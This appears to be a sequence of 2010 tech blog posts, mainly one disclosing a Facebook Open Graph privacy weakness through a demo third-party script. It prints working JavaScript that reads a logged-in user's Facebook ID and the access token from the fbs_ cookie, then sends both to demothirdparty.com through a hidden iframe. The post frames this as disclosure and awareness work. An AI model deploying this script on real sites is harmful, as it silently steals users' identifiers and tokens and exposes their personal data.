Regardless of the acronyms, this stuff is pretty cool.
Today, Intel announced that they are planning to offer a full 1080p video / movie streaming service in 2011.
This shouldn’t come as a surprise for two reasons:
1) Everyone and their brother is trying to cement their position and cash in on the fast growing movie streaming business… Amazon, Sony, Microsoft, Netflix, Blockbuster, Vudu (now owned by WalMart), CinemaNow (now owned by Best Buy) … even Sears!
2) WiDi 2.0!
WiDi 2.0 is being included in new Intel Core 2011 systems and will support 1080p streaming. If you’re unfamiliar with WiDi, it basically allows you to connect your laptop to your HDTV via WiFi (kind of like a wireless HDMI), here’s a video of the concept:
Also today, a company called Eye-Fi announced that their wireless memory cards will soon support the uploading of photos and videos from a digital camera to a smartphone or computer. Imagine taking a picture on your digital camera, sending it to your smartphone, sharing it your with friends there and elsewhere via mms, email, facebook, twitter, etc. Scotty A – I think they hacked your brain on this one.. sorry man.
Yahoo! failed to test a piece of javascript before it went live on their homepage this morning. It’s pretty important to test thoroughly when you have an audience of 180 million:
Apple caused many people to be late to work today because of an OS bug that resulted in the iPhone alarm not going off this morning: Apple Confirms iPhone Alarm Bug
Thank you for reporting this potential security issue to us. Please note that we take these reports seriously and investigate each one of them. Unfortunately, we cannot respond individually to all of them due to the high volume of reports.
I don’t know whether the ‘high volume of reports’ is a good thing or a bad thing. On one hand, at least people are reporting these issues, on the other, how many issues are there?
Data on millions of users is still vulnerable to access by unauthorized third parties
Over the past year, we have all witnessed the start of a revolution on the Internet – personalized website experiences and social integration across the web. Powering this phase of Web 2.0 transformation is none other than Facebook, whose reach and social plugins facilitate the sharing of data between its platform and the sites that users visit.
In this post, I’ll highlight Facebook’s 2010 innovation in social plugins that have opened the doors for social engagement and personalization outside of Facebook.com. I’ll also discuss how these innovations have compromised Facebook user data and demonstrate a new exploit that reveals how personal data for millions of users is still vulnerable to silent access by unauthorized third parties.
Innovation
On April 21st at the F8 developer conference, Facebook CEO Mark Zuckerberg unveiled a collection of social plugins and an API called Open Graph for enabling the integration of Facebook services and user sharing on the web beyond Facebook.com. The idea was to allow users to have personalized experiences on the websites they visit, and in doing so, increase the value and offerings of the sites (not to mention the value of Facebook).
Today, sites like CNN, ABC, WSJ, NYTimes, Amazon, Pandora, and Yelp are among thousands of websites that have already integrated FB social plugins. Users can like, review, share, see what their friends view and like, and receive personalized recommendations based on their own likes and interests – all without leaving an integrated site.
The social transformation goes far beyond widgets and plugins as companies are now designing their entire sites around FB’s social graph. Take for example, Clicker.com, who recently launched a new homepage which heavily incorporates FB’s social graph and gives users an entirely personalized experience:
“When you connect with an application or website it will have access to General Information about you. The term General Information includes your and your friends’ names, profile pictures, gender, user IDs, connections, and any content shared using the Everyone privacy setting. We may also make information about the location of your computer or access device and your age available to applications and websites in order to help them implement appropriate security measures and control the distribution of age-appropriate content.”
While additional information is shared if a user allows it, the sharing of both general and additional information does require a user to be connected to Facebook and approve the website. However, there is an exception to user initiated connections with Facebook’s Instant Personalization service.
Instant Personalization allows any ‘pre-approved’ partner site to bypass the authorization process for accessing user information by utilizing the user’s current Facebook session. Site such as Bing, Yelp, Pandora, Clicker, Scribd, Docs.com and TripAdvisor are already approved in the Instant Personalization program and can access the information of site visitors who are logged in to Facebook without any action on the user’s end.
By default the privacy settings for Instant Personalization allows Facebook to automatically share a user’s general information with partner sites unless the user has opted out.
With such shortcuts for privacy and authentication, one would hope that Facebook is taking the appropriate measures to protect user PII (personally identifiable information) and secure data from unauthorized access. Unfortunately, over the past year, there have been numerous vulnerabilities discovered which have (or could have) resulted in data leakage for millions of Facebook users.
Yelp Security Hole Puts Facebook User Data at Risk
Reported: May 11, 2010
Cross site scripting (XSS) vulnerability in Yelp.com to hijack the authentication token that Yelp uses to get user information. Could then make Open Graph API requests to Facebook API and send the information back to a malicious site.
Facebook Privacy Breach
Reported: Sunday, Oct 17, 2010
Applications found to be transmitting identifying information along with user ID to over 25 advertising, tracking, and data firms. Tens of millions of Facebook app users affected, including people who set their profiles to Facebook’s strictest privacy settings.
Although Facebook rectified these issues in a timely manner, such vulnerabilities should have been caught in a regular security/QA audit before Facebook released these products. What’s more disturbing than the lack of adequate security design and testing, is Facebook’s own loophole in their privacy policy to relinquish themselves from any responsibility:
“Although we allow you to set privacy options that limit access to your information, please be aware that no security measures are perfect or impenetrable… We cannot ensure that information you share on Facebook will not become publicly available. We are not responsible for third party circumvention of any privacy settings or security measures on Facebook.”
While I am a supporter of the innovation that Facebook has shown in 2010, I am very concerned with the privacy and security of user PII and personal data. Therefore, in hopes of raising a few eyebrows, I’ll demonstrate how easy it is (hypothetically) for an unauthorized third party on a FB integrated site to access a user’s Facebook ID, name, friends, and other personal information.
3rd Party Data Access Exploit
Before participating in this demo, please be aware that the information collected is for demonstration purposes only and that the source code and methodologies used should remain confidential.
For this demo, we have the following components:
GrumpyGrapes.com – our demo site, a mock wine review website with FB social plugins integrated to allow users to post, like, or comment on wines.
DemoThirdParty.com – represents a third party on GrumpyGrapes that could provide a service such as analytics, advertising, widgets, data pixels, etc.
Instructions:
You’ll need to have 3rd party cookies enabled in your browser for this demo.
Visit GrumpyGrapes.com, connect to Facebook, and allow GrumpyGrapes access (Remember, that if GrumpyGrapes were an Instant Personalization site you wouldn’t have to go through the process of allowing access)
The Exploit: After you’ve connected to Facebook and allowed GrumpyGrapes access, behind the scenes DemoThirdParty was able to access your Facebook ID and will store your Facebook ID in it’s cookie (go ahead and check your cookies from demothirdparty.com).
DemoThirdParty can now use your Facebook ID and the GrumpyGrapes access token to make an Open Graph request for your ‘general’ Facebook data. Logout of Facebook and click the button below to view a sample of the PII and data that DemoThirdParty would be able to obtain about you after your visit to GrumpyGrapes or any integrated site that DemoThirdParty is on:
In addition to the information above, depending on your privacy settings, other data is vulnerable to access by DemoThirdParty including your likes, interests, gender, networks, and potentially any information set as available to ‘everyone’.
While I’m not a proponent of exposing source code for exploiting vulnerabilities, this demo already contains the information and I believe it’s important in increasing knowledge for those who should be preventing this type of data exposure.
JavaScript executed by DemoThirdParty to access the user’s Facebook ID:
// create a hidden div with a link to the users FB profile (this link will be created if the user is logged in to the site or it's an instant personalization site and the user is logged in to FB)
document.write('<div style="visibility:hidden"><a href="about:blank#fb_hack"></a><fb:name uid="loggedinuser" linked="true" useyou="false" /></div>');
// check if the user is logged in (by checking the hidden link above)
// if logged in, get their userid, if not then check again in 3 seconds
function fb_link()
{
var loggedon = 0;
var links = document.getElementsByTagName('a');
for (var i = links.length - 1; i >= 0; i--)
{
var isrc = links[i].href;
// check if user is logged in
if (isrc.match('facebook.com/profile.php'))
{
loggedon = 1;
fb_uid(); // get user id
break;
}
}
if (loggedon != 1)
{
// if user is not logged in, check again in 3 seconds
setTimeout("fb_link()", 3000);
}
}
function fb_uid()
{
var id = 0;
var token;
var links2 = document.getElementsByTagName('a');
for (var j = links2.length - 1; j >= 0; j--)
{
var jsrc = links2[j].href;
// check for about:blank#fb_hack (fb profile link is next)
if (jsrc.match('about:blank#fb_hack'))
{
// get user id
var id = links2[j+1].href;
if (id.match('facebook.com/profile.php'))
{
id = id.substring(id.indexOf('id=') + 3);
token = access_token(); // get access token
addFrame(id, token); // send captured id and access token back home to 3rd party for cookieing, HTTP Requests to scrape info, etc
break;
}
}
}
}
function access_token()
{
var token = '';
if (document.cookie && document.cookie != '')
{
var split = document.cookie.split(';');
for (var i = 0; i < split.length; i++)
{
var choc_chip = split[i];
var sub = choc_chip.substring(4,0);
if (sub=="fbs_")
{
try {
token = choc_chip.substring(choc_chip.indexOf('access_token=') + 13, choc_chip.indexOf('&expires='));
} catch(e) {}
break;
}
}
}
return token;
}
function addFrame(id, atoken)
{
var rnd = Math.round(Math.random()*1000000);
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://demothirdparty.com/set.html?facebook_id="+id+"&token="+atoken+"&rnd=" + rnd + "");
ifrm.setAttribute( "frameBorder", '0' );
ifrm.setAttribute( "scrolling", 'no' );
ifrm.setAttribute( "marginwidth", '0' );
ifrm.setAttribute( "marginheight", '0' );
ifrm.style.width = 0+"px";
ifrm.style.height = 0+"px";
document.body.appendChild(ifrm);
}
setTimeout("fb_link()", 3000);
Why this is a Problem
This exploit allows an unauthorized third party to silently access a user’s Facebook ID and a site’s access token, which can be used by the party to access PII including a Facebook user’s name (even if that person has set all of his or her Facebook information to be private), friends, news feed, other general information, and data shared with ‘everyone’ with no action required on the user’s part.
This data can be used to build complex user profiles in the party’s domain for monetization or malicious purposes.
What to do
On a personal note, I strongly believe in never reporting a problem without a suggestion for a solution. I’m reporting this issue (along with some ideas for fixing) to Facebook. I’ll keep you posted if I hear anything from FB. In the meantime, I would recommend opting out of services that do not properly and responsibly protect user PII until Facebook shows more commitment to data protection on social integrated sites.
It didn’t take long to discover a vulnerability allowing unauthorized 3rd parties access to a user’s Facebook ID and FB data on social plugin integrated sites.
I’m working on a lengthier post that will include the exploit.. stay tuned..
Ahh, the Holidays.. Family gatherings, consuming food until we can’t move, exchanging gifts, and inevitably in our modern culture – the chatter about what family members are posting on Facebook.
As the F word entered into my family’s gossip this year, it was accompanied by an intriguing question, “how safe and private is our Facebook information?” What a great first post, I thought.
Naturally, the first place I started was the Facebook privacy policy, where I came across this gem:
Risks inherent in sharing information:
Although we allow you to set privacy options that limit access to your information, please be aware that no security measures are perfect or impenetrable. We cannot control the actions of other users with whom you share your information. We cannot guarantee that only authorized persons will view your information. We cannot ensure that information you share on Facebook will not become publicly available. We are not responsible for third party circumvention of any privacy settings or security measures on Facebook. http://www.facebook.com/policy.php
I don’t know about you, but to me that doesn’t exude a lot of confidence in FB’s data security and privacy methodologies. I have 7 hours of airport and flight time (w/ WiFi) as I travel from Ohio back to California two days from now. Hence, I present the Facebook Data Security Challenge. 7 hours to find potential vulnerabilities that could be used by unauthorized or malicious third parties to access a user’s FB information.
